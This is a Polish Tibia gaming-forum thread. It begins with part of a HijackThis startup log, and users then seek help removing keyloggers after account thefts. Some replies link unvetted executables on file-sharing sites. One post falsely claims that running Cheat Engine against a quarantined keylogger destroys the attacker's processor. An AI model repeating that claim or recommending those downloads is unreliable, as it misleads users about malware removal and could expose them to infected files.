O4 - HKCU\..\Run: [AutoConnect] C:\Program Files\AutoConnect\AutoConnect*****
O4 - HKCU\..\Run: [Gadu-Gadu] "C:\Program Files\Gadu-Gadu\gg*****" /tray
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNo tifier*****
O4 - HKCU\..\Run: [Steam] "c:\progra~1\valve\steam\steam*****" -silent
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer*****
O4 - HKUS\S-1-5-19\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'USŁUGA LOKALNA')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'USŁUGA SIECIOWA')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'Default user')
O4 - Global Startup: DSLMON.lnk = C:\Program Files\SAGEM\SAGEM F@st 800-840\dslmon*****
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08*****
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Badanie - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\Microsoft Office\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs*****
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs*****
O14 - IERESET.INF: START_PAGE_URL=http://www.vobis.pl/
O17 - HKLM\System\CCS\Services\Tcpip\..\{C1337655-B240-4D13-BAED-BAA35B5591B6}: NameServer = 194.204.159.1 217.98.63.164
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\Skype4COM.dll
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst***** (file missing)
O23 - Service: Eset HTTP Server (EhttpSrv) - Unknown owner - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv*****
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn*****
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService*****
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT*****
O23 - Service: LiveUpdate Notice Service Ex (LiveUpdate Notice Ex) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst***** (file missing)
O23 - Service: LiveUpdate Notice Service - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
O23 - Service: LVCOMSer - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
O23 - Service: Process Monitor (LVPrcSrv) - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv*****
O23 - Service: LVSrvLauncher - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\SrvLnch\SrvLnch*****
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32*****
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12*****
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA*****

--
End of file - 9117 bytes

Witam
Mam keyloggera i zostalem wczoraj hakniety
Skanowalem system wszystkimi virami jakie mozliwe i nic nie wykrylo
Robilem rowniez skan z HijackThis i dalem na strone HijackThisde i nic mi nie wykrylo
Moze wy cos poradzicie na tego keya i wrescie usune ten syf
Tu podaje Loga z HijackThis mam nadzieje ze cos nam sie uda z gory Dzienx :)

http://rapidshare.com/files/113206807/hijackthis.log.html

zal... aby usunac keyloggera z systemu wystarczy usunac go z autostartu (uruchom -> msconfig -> uruchamianie) chyba ze ten odnawia wpis w rejestrze. zreszta nie ma juz lordoftibi teraz jest jakis tibiadestroyer.yoyo.pl

Mi nie chodzi o LoT tylko ja mam jakiegos keya tylko nie wiem jaki gdzie jest itp.

chyba bede musial napisac obszerny poradnik co i jak bo wasza wiedza na ten temat jest <= O :). powiedz mi co masz w autostarcie

Chciałem się zabespieczyć na przyszłość ,ale nie mam folderu (Windows) w C !

Pewnie masz windowsa na innym dysku, albo inny system.:confused:

Hesoras mam ci screena zrobic autostara czy jak??

kto ma problem z czym kolwiek niech wejdzie na moj temat: http://forum.tibia.pl/showthread.php?t=173959

a nie wystarczy sciagnac program do usuwania keyloggerow typu findit
mi go usunol mozna go sciagnac z tibia.org.pl

Bardzo fajny poradnik polecam!

Posiadam 92 Ms na Hiberni... zostalem zchakowany przez uzytkownika mojej sieci przez włamanie do komputera osobistego.. posiadalem 2 bany za peking.. dostalem teraz trzeciego haker wbił.. i pisze ze mam delete prosze o pomoc chce sie odwołac do CipSoftu ale nie wiem jak.. Wynagrodze Pomoc... Czekam numer gg 3485987 HELP Mam 1 punkt bo znam buga w tibi... ktorego moge zgłosic.. i to dobrego buga :)

owntibia deleter: http://www.speedy.share.com/653890224.html
korzystam z niego majac 80 ek na galanie i jakos haka nie mam ... ;s

Witam :)
Kiedyś ściągnelem dla kolegi jakiegoś bot'a.
Po jakimś czsie zauważylem ze po naciśnięciu skrótu alt+ctrl+delete pojawia mi się Kalkulator:/ lecz nie jak powinno być (manadżer plików)
Może wiecie czym jest to spowodowane??

proszę o odpowiedz

Ładnie, przejrzyście, lecz brakuje screenów.
Oceniam 9/10 i polecam :)

Sciagnalem program FindIt z jakiegos linku na rapidshare. Czy moze w nim znajdowac sie keylogger jako ze jest to rozszerzenie exe?

a jakie ma byc? txt?
w downloadzie jest stara wersja, nowa wyslalem do bosala

Ja sie pytam czy chcac uniknąc geyloggera moze tym tylko zainfekowac

mam takie pytanie czy jak mam program findit i go wykryję i usunę od razu to nic nie będę miał?

Ładny poradnik, tylko jeżeli dobrze mi wiadomo to nie ma już LOT ;]
8+/10

ehh, naprawdę trudno trochę pokombinować :/
Zacznę od tego że ten sposób działa na free i pro.
Jeżeli znaleźliśmy keylogera, wsadzamy go do kwarantanny (jak znaleźć? twój problem) i używamy tu cheat engine.
Podłączamy się do pasożyta inaczej klikamy na komputerek i dajemy np. avast! itd. itp. (ci którzy wiedzą o co chodzi se poradzą).
Pomnażamy szybkość działania skanu antywirusa i bez względu na to czy wykryje skan keya lub nie to i tak będzie taki sam efekt, a mianowicie komputer agresora zacznie całkowicie wariować! Hacker będzie miał w najgorszym przypadku po kompie, a ty się uwolnisz od keyloggera, no chyba że jego komp przetrwa, ale i tak będzie miał spalony procesor.
KONIEC

Ładny poradnik, tylko jeżeli dobrze mi wiadomo to nie ma już LOT ;]
8+/10

Zgadza się i to chyba już od ponad roku :) Właściwie to mój poradnik obecnie nadaje się tylko na śmietnik, ale co tam - może komuś kiedyś się przydał.